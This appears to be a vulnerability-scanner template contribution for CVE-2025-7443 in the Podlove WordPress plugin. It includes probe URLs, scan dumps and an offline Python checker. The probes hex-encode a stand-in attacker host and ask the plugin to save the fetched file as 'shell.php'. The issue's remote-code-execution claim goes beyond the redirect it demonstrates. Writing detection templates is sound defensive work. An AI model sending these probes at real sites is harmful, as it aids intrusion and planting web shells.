[TEMPLATE CONTRIBUTION] CVE-2025-7443 #13863

@zer0p0intvvv

Description

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: wp-podlove-arbitrary-file-upload

info:
  name: Podlove Podcast Publisher - Arbitrary File Upload
  author: zer0p0int
  severity: high
  description: |
    Podlove Podcast Publisher plugin for WordPress contains an arbitrary file upload vulnerability in the image handling functionality.
    The vulnerability allows unauthenticated attackers to upload arbitrary files via specially crafted requests to the image cache endpoint.
    This can lead to remote code execution on the target server.
  reference:
    - https://plugins.trac.wordpress.org/browser/podlove-podcasting-plugin-for-wordpress/tags/4.2.6/lib/model/image.php#L465
    - https://plugins.trac.wordpress.org/changeset/3364994/
  classification:
    cve-id: CVE-2025-7443
  tags: cve,cve2025,wordpress,wp-plugins,podlove,file-upload,rce

http:
  - method: GET
    path:
      # podlove_image_cache_url carries the remote image URL hex-encoded;
      # the blob below decodes to http://evil-server.com/test.php, and
      # podlove_file_name is the name the plugin will store it under.
      - "{{BaseURL}}/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php"
      # Same fields as path segments on the rewrite-rule endpoint.
      - "{{BaseURL}}/podlove/image/687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870/100/100/0/shell.php"
    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    # Do not follow the redirect: the 307 to the attacker-supplied host is the
    # signal, and following it would make the scanner fetch whatever that host serves.
    redirects: false
    # Both conditions are required. A bare "status 200" matcher combined with
    # matchers-condition: or fires on every reachable host, so it was removed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 307
      - type: word
        part: header
        words:
          - "Location: http://evil-server.com/test.php"

Relevant dumped responses

GET /?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php HTTP/1.1
Host: 192.168.3.14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [wp-podlove-arbitrary-file-upload] Dumped HTTP response http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

HTTP/1.1 404 Not Found
Connection: close
Transfer-Encoding: chunked
Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Fri, 07 Nov 2025 07:57:47 GMT
Server: nginx/1.27.0
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encoding
X-Powered-By: Next.js

<!DOCTYPE html><html lang="en-US" class="h-full" data-theme="light"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover, user-scalable=no"/><link rel="stylesheet" href="/_next/static/css/21432139d29da21c.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/621c65b86bcfdced.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/7d3139ae547f7985.css" data-precedence="next"/><link rel="stylesheet" href="/_next/static/css/e3c08fb4605a062f.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-f871d985ecd54594.js"/><script src="/_next/static/chunks/fd9d1056-014bed05f3bb9932.js" async=""></script><script src="/_next/static/chunks/2117-facb83e7cbe5e185.js" async=""></script><script src="/_next/static/chunks/main-app-813cfbf9a5fdbcf0.js" async=""></script><script src="/_next/static/chunks/3014691f-7b8a12098efe735b.js" async=""></script><script src="/_next/static/chunks/396464d2-cf55f85ac46a5f44.js" async=""></script><script src="/_next/static/chunks/2444-04084a0cafe2ece9.js" async=""></script><script src="/_next/static/chunks/3949-07307cc475805761.js" async=""></script><script src="/_next/static/chunks/8054-2a7147af81892a01.js" async=""></script><script src="/_next/static/chunks/2155-837f5e5dcd672d0c.js" async=""></script><script src="/_next/static/chunks/9026-7a28f578710033ce.js" async=""></script><script src="/_next/static/chunks/app/layout-7d1eaf8453fb1b4e.js" async=""></script><meta name="robots" content="noindex"/><meta name="theme-color" content="#FFFFFF"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-bar-style" content="default"/><title>404: This page could not be found.</title><title>Dify</title><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" 
noModule=""></script></head><body class="h-full select-auto color-scheme" data-api-prefix="/console/api" data-pubic-api-prefix="/api" data-public-edition="SELF_HOSTED" data-public-sentry-dsn="" data-public-site-about="" data-public-text-generation-timeout-ms="60000" data-public-top-k-max-value="" data-public-indexing-max-segmentation-tokens-length=""><div style="font-family:system-ui,&quot;Segoe UI&quot;,Roboto,Helvetica,Arial,sans-serif,&quot;Apple Color Emoji&quot;,&quot;Segoe UI Emoji&quot;;height:100vh;text-align:center;display:flex;flex-direction:column;align-items:center;justify-content:center"><div><style>body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}</style><h1 class="next-error-h1" style="display:inline-block;margin:0 20px 0 0;padding:0 23px 0 0;font-size:24px;font-weight:500;vertical-align:top;line-height:49px">404</h1><div style="display:inline-block"><h2 style="font-size:14px;font-weight:400;line-height:49px;margin:0">This page could not be found.</h2></div></div></div><script src="/_next/static/chunks/webpack-f871d985ecd54594.js" 
async=""></script><script>(self.__next_f=self.__next_f||[]).push([0]);self.__next_f.push([2,null])</script><script>self.__next_f.push([1,"1:HL[\"/_next/static/css/21432139d29da21c.css\",\"style\"]\n2:HL[\"/_next/static/css/621c65b86bcfdced.css\",\"style\"]\n3:HL[\"/_next/static/css/7d3139ae547f7985.css\",\"style\"]\n4:HL[\"/_next/static/css/e3c08fb4605a062f.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"5:I[12846,[],\"\"]\n7:I[4707,[],\"\"]\n8:I[36423,[],\"\"]\n9:I[37971,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\na:I[41403,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\nb:I[64129,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"TanstackQueryIniter\"]\nc:I[98418,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static
/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c.js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"default\"]\nd:I[59990,[\"3665\",\"static/chunks/3014691f-7b8a12098efe735b.js\",\"9119\",\"static/chunks/396464d2-cf55f85ac46a5f44.js\",\"2444\",\"static/chunks/2444-04084a0cafe2ece9.js\",\"3949\",\"static/chunks/3949-07307cc475805761.js\",\"8054\",\"static/chunks/8054-2a7147af81892a01.js\",\"2155\",\"static/chunks/2155-837f5e5dcd672d0c"])</script><script>self.__next_f.push([1,".js\",\"9026\",\"static/chunks/9026-7a28f578710033ce.js\",\"3185\",\"static/chunks/app/layout-7d1eaf8453fb1b4e.js\"],\"ToastProvider\"]\n13:I[61060,[],\"\"]\ne:{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"}\nf:{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"}\n10:{\"display\":\"inline-block\"}\n11:{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0}\n14:[]\n"])</script><script>self.__next_f.push([1,"0:[\"$\",\"$L5\",null,{\"buildId\":\"qJak2oWJ3DjrvlDSy50D4\",\"assetPrefix\":\"\",\"urlParts\":[\"\",\"test.php\"],\"initialTree\":[\"\",{\"children\":[\"/_not-found\",{\"children\":[\"__PAGE__\",{}]}]},\"$undefined\",\"$undefined\",true],\"initialSeedData\":[\"\",{\"children\":[\"/_not-found\",{\"children\":[\"__PAGE__\",{},[[\"$L6\",[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":{\"fontFamily\":\"system-ui,\\\"Segoe UI\\\",Roboto,Helvetica,Arial,sans-serif,\\\"Apple 
Color Emoji\\\",\\\"Segoe UI Emoji\\\"\",\"height\":\"100vh\",\"textAlign\":\"center\",\"display\":\"flex\",\"flexDirection\":\"column\",\"alignItems\":\"center\",\"justifyContent\":\"center\"},\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":{\"display\":\"inline-block\",\"margin\":\"0 20px 0 0\",\"padding\":\"0 23px 0 0\",\"fontSize\":24,\"fontWeight\":500,\"verticalAlign\":\"top\",\"lineHeight\":\"49px\"},\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":{\"display\":\"inline-block\"},\"children\":[\"$\",\"h2\",null,{\"style\":{\"fontSize\":14,\"fontWeight\":400,\"lineHeight\":\"49px\",\"margin\":0},\"children\":\"This page could not be 
found.\"}]}]]}]}]],null],null],null]},[null,[\"$\",\"$L7\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\",\"/_not-found\",\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L8\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":\"$undefined\",\"notFoundStyles\":\"$undefined\"}]],null]},[[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/21432139d29da21c.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"1\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/621c65b86bcfdced.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"2\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/7d3139ae547f7985.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}],[\"$\",\"link\",\"3\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/e3c08fb4605a062f.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en-US\",\"className\":\"h-full\",\"data-theme\":\"light\",\"children\":[[\"$\",\"head\",null,{\"children\":[[\"$\",\"meta\",null,{\"name\":\"theme-color\",\"content\":\"#FFFFFF\"}],[\"$\",\"meta\",null,{\"name\":\"mobile-web-app-capable\",\"content\":\"yes\"}],[\"$\",\"meta\",null,{\"name\":\"apple-mobile-web-app-capable\",\"content\":\"yes\"}],[\"$\",\"meta\",null,{\"name\":\"apple-mobile-web-app-status-bar-style\",\"content\":\"default\"}]]}],[\"$\",\"body\",null,{\"className\":\"h-full select-auto 
color-scheme\",\"data-api-prefix\":\"/console/api\",\"data-pubic-api-prefix\":\"/api\",\"data-public-edition\":\"SELF_HOSTED\",\"data-public-support-mail-login\":\"$undefined\",\"data-public-sentry-dsn\":\"\",\"data-public-maintenance-notice\":\"$undefined\",\"data-public-site-about\":\"\",\"data-public-text-generation-timeout-ms\":\"60000\",\"data-public-top-k-max-value\":\"\",\"data-public-indexing-max-segmentation-tokens-length\":\"\",\"children\":[\"$\",\"$L9\",null,{\"children\":[\"$\",\"$La\",null,{\"children\":[\"$\",\"$Lb\",null,{\"children\":[\"$\",\"$Lc\",null,{\"locale\":\"en-US\",\"children\":[\"$\",\"$Ld\",null,{\"children\":[\"$\",\"$L7\",null,{\"parallelRouterKey\":\"children\",\"segmentPath\":[\"children\"],\"error\":\"$undefined\",\"errorStyles\":\"$undefined\",\"errorScripts\":\"$undefined\",\"template\":[\"$\",\"$L8\",null,{}],\"templateStyles\":\"$undefined\",\"templateScripts\":\"$undefined\",\"notFound\":[[\"$\",\"title\",null,{\"children\":\"404: This page could not be found.\"}],[\"$\",\"div\",null,{\"style\":\"$e\",\"children\":[\"$\",\"div\",null,{\"children\":[[\"$\",\"style\",null,{\"dangerouslySetInnerHTML\":{\"__html\":\"body{color:#000;background:#fff;margin:0}.next-error-h1{border-right:1px solid rgba(0,0,0,.3)}@media (prefers-color-scheme:dark){body{color:#fff;background:#000}.next-error-h1{border-right:1px solid rgba(255,255,255,.3)}}\"}}],[\"$\",\"h1\",null,{\"className\":\"next-error-h1\",\"style\":\"$f\",\"children\":\"404\"}],[\"$\",\"div\",null,{\"style\":\"$10\",\"children\":[\"$\",\"h2\",null,{\"style\":\"$11\",\"children\":\"This page could not be found.\"}]}]]}]}]],\"notFoundStyles\":[]}]}]}]}]}]}]}]]}]],null],null],\"couldBeIntercepted\":false,\"initialHead\":[[\"$\",\"meta\",null,{\"name\":\"robots\",\"content\":\"noindex\"}],\"$L12\"],\"globalErrorComponent\":\"$13\",\"missingSlots\":\"$W14\"}]\n"])</script><script>self.__next_f.push([1,"12:[[\"$\",\"meta\",\"0\",{\"name\":\"viewport\",\"content\":\"width=device-width, 
initial-scale=1, maximum-scale=1, viewport-fit=cover, user-scalable=no\"}],[\"$\",\"meta\",\"1\",{\"charSet\":\"utf-8\"}],[\"$\",\"title\",\"2\",{\"children\":\"Dify\"}]]\n6:null\n"])</script></body></html>
[DBG] [wp-podlove-arbitrary-file-upload] Dumped HTTP response http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

HTTP/1.1 307 Temporary Redirect
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Fri, 07 Nov 2025 07:57:42 GMT
Location: http://evil-server.com/test.php
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Content-Length: 0

[wp-podlove-arbitrary-file-upload:status-2] [http] [high] http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php
[wp-podlove-arbitrary-file-upload:word-4] [http] [high] http://192.168.3.14/?podlove_image_cache_url=687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870&podlove_width=100&podlove_height=100&podlove_crop=0&podlove_file_name=shell.php

Because of the 307 error, any malicious URL can be used to download and execute files.

Anything else?

https://plugins.trac.wordpress.org/browser/podlove-podcasting-plugin-for-wordpress/tags/4.2.6/lib/model/image.php#L465
https://plugins.trac.wordpress.org/changeset/3364994/
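As an added worked example (this is not code from the issue, from the nuclei-templates project or from the Podlove plugin), the script below does by hand what the template above does: it hex-encodes the remote URL into the `podlove_image_cache_url` parameter, rebuilds the query-string probe from the template, and decides from a raw HTTP response whether the host redirected to that attacker-supplied URL. It does not follow the redirect, and it accepts any of 301/302/307/308 as long as `Location` is exactly the URL that was encoded into the request, which is slightly broader than the 307 the issue observed. The two sample responses are constructed replicas of the headers dumped in the issue; the host `192.168.3.14` and `evil-server.com` are reused from the issue only as sample values, and nothing here touches the network.

```python
"""Build the Podlove image-cache probe and classify a raw HTTP response.

Added example; not part of the original issue or the Podlove plugin. Sample
responses are constructed replicas of the dumps in the issue (offline only).
"""
import binascii
from urllib.parse import urlencode

# Hex blob used in the template; it decodes to http://evil-server.com/test.php
TEMPLATE_HEX = "687474703a2f2f6576696c2d7365727665722e636f6d2f746573742e706870"

# Redirect statuses accepted as evidence when Location matches exactly.
REDIRECT_STATUSES = (301, 302, 307, 308)


def encode_cache_url(url: str) -> str:
    """Podlove expects the remote image URL hex-encoded in podlove_image_cache_url."""
    return binascii.hexlify(url.encode("utf-8")).decode("ascii")


def decode_cache_url(hex_url: str) -> str:
    """Inverse of encode_cache_url; shows what a captured probe was pointing at."""
    return binascii.unhexlify(hex_url).decode("utf-8")


def build_probe_url(base_url: str, remote_url: str, file_name: str = "shell.php",
                    width: int = 100, height: int = 100, crop: int = 0) -> str:
    """Query-string form of the probe from the template. The /podlove/image/...
    form carries the same five fields as path segments in the same order."""
    query = urlencode({
        "podlove_image_cache_url": encode_cache_url(remote_url),
        "podlove_width": width,
        "podlove_height": height,
        "podlove_crop": crop,
        "podlove_file_name": file_name,
    })
    return f"{base_url.rstrip('/')}/?{query}"


def parse_response_head(raw: bytes):
    """Return (status_code, {lower-case header name: value}) from a raw HTTP/1.1 response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def redirects_to_remote(raw: bytes, remote_url: str) -> bool:
    """True only when the server redirects to exactly the URL we encoded into
    the request. A generic 200, a 404, or a redirect elsewhere is not evidence."""
    status, headers = parse_response_head(raw)
    return status in REDIRECT_STATUSES and headers.get("location") == remote_url


# Constructed replicas of the two responses dumped in the issue.
VULNERABLE_307 = (
    b"HTTP/1.1 307 Temporary Redirect\r\n"
    b"Connection: close\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"Location: http://evil-server.com/test.php\r\n"
    b"Server: Apache/2.4.56 (Debian)\r\n"
    b"X-Powered-By: PHP/8.0.30\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
NOT_FOUND_404 = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Server: nginx/1.27.0\r\n"
    b"\r\n"
    b"<!DOCTYPE html><title>404: This page could not be found.</title>"
)

if __name__ == "__main__":
    remote = decode_cache_url(TEMPLATE_HEX)
    print("template probe targets:", remote)
    print("probe URL:", build_probe_url("http://192.168.3.14", remote))
    print("307 dump redirects to our URL:", redirects_to_remote(VULNERABLE_307, remote))
    print("404 dump redirects to our URL:", redirects_to_remote(NOT_FOUND_404, remote))
```

The exact `Location` comparison is the part worth keeping when adapting this to a scanner: it ties the redirect to the value the scanner itself injected, which is what separates this finding from an unrelated redirect on the site.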
